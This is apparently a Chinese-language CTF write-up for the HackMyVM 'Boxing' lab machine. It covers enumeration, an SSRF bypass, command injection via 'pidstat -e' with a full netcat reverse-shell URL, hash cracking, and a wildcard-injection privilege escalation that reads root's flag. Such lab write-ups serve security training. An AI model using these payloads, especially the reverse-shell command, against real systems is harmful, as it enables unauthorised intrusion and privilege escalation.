简介
靶机名称:Boxing
难度:中等
靶场地址:https://hackmyvm.eu/machines/machine.php?vm=Boxing
本地环境
虚拟机:vitual box
靶场IP(Boxing):192.168.56.107
跳板机IP(windows 10):192.168.56.1 192.168.190.100
渗透机IP(ubuntu 22.04):192.168.190.30
扫描
用zenmap
nmap -p 1-65535 -T4 -A -v 192.168.56.107/32
确定端口为22和80
http
域名泄露
boxing,也就是拳击的网页喽
在附近打了下点,发现向/feedback.php发包后会返回域名staging-env.boxing.hmv
路径爆破
把域名加入hosts后,在重新进行域名和路径爆破之前先直接访问这个子域名试试
内部服务器检查……输入一个url后会解析出没有图片的网页
扫一下路径,发现新东西
feroxbuster -u http://staging-env.boxing.hmv/ -t 20 -w $HVV_PATH/8_dict/Dictionary/directoryDicts/Filenames_or_Directories_All.txt -d 2
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.10.2
───────────────────────────┬──────────────────────
🎯 Target Url │ http://staging-env.boxing.hmv/
🚀 Threads │ 20
📖 Wordlist │ /root/Tool/HVV//8_dict/Dictionary/directoryDicts/Filenames_or_Directories_All.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.10.2
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 2
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403 GET 9l 28w 287c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404 GET 9l 31w 284c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 46l 91w 1167c http://staging-env.boxing.hmv/index.php
301 GET 9l 28w 332c http://staging-env.boxing.hmv/cache => http://staging-env.boxing.hmv/cache/
200 GET 1l 1w 178c http://staging-env.boxing.hmv/cache/707971e003b4ae6c8121c3a920e507f5-le64.cache-8
200 GET 46l 91w 1167c http://staging-env.boxing.hmv/
200 GET 174l 314w 5216c http://staging-env.boxing.hmv/cache/client_requests.har.swp
200 GET 4l 23w 190c http://staging-env.boxing.hmv/cache/CACHEDIR.TAG
200 GET 5l 27w 1884c http://staging-env.boxing.hmv/cache/data_block.bin
[####################] - 7s 45529/45529 0s found:7 errors:11858
[####################] - 6s 45523/45523 7534/s http://staging-env.boxing.hmv/
[####################] - 0s 45523/45523 373139/s http://staging-env.boxing.hmv/cache/ => Directory listing
CACHEDIR.TAG的内容
Signature: 8a477f597d28d172789f06886806bc55
# This file is a cache directory tag created by man-db.
# For information about cache directory tags, see:
# http://www.brynosaurus.com/cachedir/
这下知道有使用man-db
然后就是client_requests.har.swp,其实就是feedback的内容,其中有一条很让人感兴趣
"postData": {
"mimeType": "application/x-www-form-urlencoded",
"text": "feedback=Hello%21+You+don%27t+have+a+link+to+reset+the+password%2C+and+I%27ve+forgotten+it%21+I+tried+Cassius%21+but+it+doesn%27t+work%3B+Contact+me+asap+pease%21%0D%0A%0D%0ACassius",
"params": [
{
"name": "feedback",
"value": "Hello%21+You+don%27t+have+a+link+to+reset+the+password%2C+and+I%27ve+forgotten+it%21+I+tried+Cassius%21+but+it+doesn%27t+work%3B+Contact+me+asap+pease%21%0D%0A%0D%0ACassius"
}
]
}
至少我们知道有个用户叫做Cassius,并且试过密码Cassius!
SSRF攻击
信息收集完成,回到原来的网页上打点
参考https://websec.readthedocs.io/zh/latest/vuln/ssrf.html
尝试了一下,确实只需要输入boxing.hmv@开头之后就能访问解析任意网页
写一个php的反弹shell,用http挂起来访问即……不可。咋也弹不回来
那么重新来,在这个基础上再进行扫描,不过这次不用nmap了,得用路径代替端口
ffuf -u http://staging-env.boxing.hmv/index.php\?url=boxing.hmv@127.0.0.1:FUZZ -w ./pass -c -H "User-Agent: Mozilla/5.0 Windows NT 10.0 Win64 AppleWebKit/537.36 Chrome/69.0.3497.100" -t 50 -fw 395
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0
________________________________________________
:: Method : GET
:: URL : http://staging-env.boxing.hmv/index.php?url=boxing.hmv@127.0.0.1:FUZZ
:: Wordlist : FUZZ: /root/problem/HVV/boxing/pass
:: Header : User-Agent: Mozilla/5.0 Windows NT 10.0 Win64 AppleWebKit/537.36 Chrome/69.0.3497.100
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 50
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response words: 395
________________________________________________
0 [Status: 200, Size: 25021, Words: 10556, Lines: 702, Duration: 30ms]
80 [Status: 200, Size: 25021, Words: 10556, Lines: 702, Duration: 17ms]
5000 [Status: 200, Size: 2367, Words: 828, Lines: 96, Duration: 4ms]
:: Progress: [65535/65535] :: Job [1/1] :: 1269 req/sec :: Duration: [0:00:10] :: Errors: 0 ::
可以看见5000端口是暴露的,访问看看
点击提交的话,会通过post方法传递意义不明的processName字段,然后没有任何回显。
这是因为访问该网页时利用了SSRF,所以POST传参也得转变为用GET传参
http://staging-env.boxing.hmv/index.php/?url=boxing.hmv@127.0.0.1:5000?processName=id
好吧,id没弹出来,弹出来pidstat。这个命令本身是用来查看用户态和系统态CPU占用的,但是加上-e参数后就可以执行命令了。
这下成功注入命令了
构造url
http://staging-env.boxing.hmv/index.php/?url=boxing.hmv@127.0.0.1:5000?processName=pidstat%2B-e%2Bnc%2b-e%2b/bin/sh%2b192.168.56.1%2b40001
成功弹回shell
提权
定向爆破
在网站的数据库中找到用户cassius的hash
至于为什么叫做定向爆破,主要是手上的几个字典都爆不出hash……不过结合之前泄露出来的Cassius!,可以了解密码会和这个字符串有关。
这边用了雨苁的密码生成器https://www.ddosi.org/pass8/
john --wordlist=passwd.txt ./pass
得到密码为Cassius!123
root
linpeas找到了SUID
incrontab看着像有什么东西,但又不知道怎么利用,直到看到/opt中的脚本
文心是这样说的
相当于日志这样的东西
其中sos.sh的内容如下
#!/bin/bash
logs="/opt/sos/logs/output-logs.txt"
rm $logs
exec &>$logs
cd /home/cassius
file *
ss -altupn
last -a
w
ps aux
top -n 1
lsof
for user in $(cut -f1 -d: /etc/passwd); do
echo "Cron jobs for $user:"
crontab -u $user -l
done
tail /var/log/syslog
sha256sum /bin/* /sbin/* /usr/bin/* /usr/sbin/*
chmod 700 $logs
看到file * 这个命令,*这个通配符仅仅起到匹配传递字符串的作用,而且是在执行命令之前完成的。也就是说如果有文件名为-f的文件,那么最后会变成执行file -f。
那我们除了创建-f,还需要创建一个/root/root.txt的软连接,这样才能读取到内容
cassius@boxing:~$ ls -l
total 4
-rw-r--r-- 1 cassius cassius 0 Apr 14 17:23 -f
lrwxrwxrwx 1 cassius cassius 14 Apr 14 17:21 root -> /root/root.txt
-rwx------ 1 cassius cassius 33 Feb 4 03:15 user.txt
值得一提的是,sos会把结果输出到/opt/sos/logs/output-logs.txt,这个文件对我们是可读的——直到执行chmod 700 $logs。所以我们需要对应写一个脚本来持续监听日志的内容。
while :;do cat /opt/sos/logs/output-logs.txt 2>/dev/null;done
最后触发一下脚本
chmod 700 ./user.txt
得到flag
19ed17ba1da85521ce659aeeb5ecd751
305
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
